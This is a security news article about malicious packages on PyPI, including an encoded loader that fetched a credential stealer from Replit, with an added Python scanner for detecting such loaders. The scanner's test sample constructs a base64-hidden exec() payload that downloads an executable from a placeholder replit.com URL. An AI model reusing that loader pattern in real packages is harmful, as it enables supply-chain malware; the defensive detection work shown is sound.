The PyPI (Python Package Index) team has temporarily suspended new projects and users on their platform due to malicious activity.
This surge in malicious activity aligns with a larger trend observed across several open-source registries in recent months. Notably, incidents such as the flood of malicious packages on the npm JavaScript package manager and a similar attack on the NuGet package manager last year, involving over 140,000 malicious packages, have highlighted the vulnerability of these platforms.
PyPI experienced a sudden spike in package publications last week. For example, a threat actor exploited three user accounts to publish numerous malicious packages, including one called “OaxStealer.” This package contained encoded code that, when executed, downloaded a second piece of malware from a legitimate service called “replit.com.”
The downloaded malware was designed to steal sensitive information from victims, including credentials, file names, and screenshots.
Notably, the attackers utilised the legitimate SaaS platform Replit as a command-and-control (C2) server to collect the stolen data.
Investigating the attacker’s account, researchers from application security testing firm Checkmarx discovered the complete code of the C2 server and the .exe files used in the attack.
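The two behaviours described above, encoded code handed to exec() and a second stage fetched from replit.com, are the kind of thing a package-intake scanner can flag statically. The following is an added illustration, not code from the article or from Checkmarx; the host list, the base64 heuristic and the sample sources are constructed for the example.

```python
# Added example (not from the article or Checkmarx): a small static check for
# the loader shape the article describes, i.e. exec()/eval() of a decoded blob
# and a download URL pointing at replit.com, even when the URL is hidden inside
# the base64 payload. Host list, regex threshold and samples are constructed.
import ast
import base64
import re

SUSPICIOUS_HOSTS = ("replit.com",)            # constructed list; extend as needed
DECODERS = {"b64decode", "b32decode", "b16decode", "decompress", "unhexlify"}
B64_RE = re.compile(r"^[A-Za-z0-9+/=\s]{40,}$")  # long base64-looking constants

def _call_name(node):
    """Name of the called function, e.g. 'exec' or 'b64decode'."""
    f = node.func
    return f.attr if isinstance(f, ast.Attribute) else getattr(f, "id", "")

def _decoded_text(value):
    """Best-effort decode of a base64-looking constant; '' if not decodable."""
    if not B64_RE.match(value):
        return ""
    try:
        return base64.b64decode(value).decode("utf-8", "ignore")
    except ValueError:            # binascii.Error (bad padding) is a ValueError
        return ""

def _hosts_in(text):
    return [h for h in SUSPICIOUS_HOSTS
            if re.search(r"https?://[^\s'\"]*" + re.escape(h), text)]

def scan_source(source):
    """Return (kind, line) findings for one Python source string."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call) and _call_name(node) in ("exec", "eval"):
            # exec(<expression that decodes a blob>) is the classic loader shape
            if node.args and any(isinstance(n, ast.Call) and _call_name(n) in DECODERS
                                 for n in ast.walk(node.args[0])):
                findings.append(("exec_of_decoded_payload", node.lineno))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            for h in _hosts_in(node.value):
                findings.append(("url_to_" + h, node.lineno))
            for h in _hosts_in(_decoded_text(node.value)):   # URL hidden in the blob
                findings.append(("encoded_url_to_" + h, node.lineno))
    return findings

# Constructed samples (not the real package): a loader hiding the stage-2 URL
# inside a base64 blob, and a benign module for comparison.
STAGE2 = b"import urllib.request\nurllib.request.urlretrieve('https://replit.com/@EXAMPLE/stage2', 'x.exe')\n"
MALICIOUS_SAMPLE = "import base64\nexec(base64.b64decode('%s'))\n" % base64.b64encode(STAGE2).decode()
BENIGN_SAMPLE = "import requests\nr = requests.get('https://pypi.org/simple/')\n"
```

Running scan_source over each module in a wheel or sdist before installation gives a cheap pre-screen; a plaintext constant and a decoded one are reported separately so that the encoded case, which a plain grep for the host would miss, stands out.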
This incident serves as a reminder that the abuse of open-source registries is not limited to PyPI alone but poses a broader threat to the entire ecosystem. It is crucial to shift the focus from solely detecting attacks to identifying the attackers behind these malicious activities.
Checkmarx notes that understanding the tactics, techniques, and procedures (TTPs) used by the attackers is essential to defend against such attacks effectively.
To ensure the safety of the open-source ecosystem, it is imperative that the community invests in developing new infrastructure and sharing attack data. Supporting the efforts of platforms like PyPI is vital to a thriving open-source ecosystem.
Developers and organisations seeking secure frameworks are encouraged to explore initiatives like OpenSSF S2C2F and community projects like the Overlay extension, which help developers evaluate open-source packages before adopting them.
Relevant: Clipper malware found in over 451 PyPI packages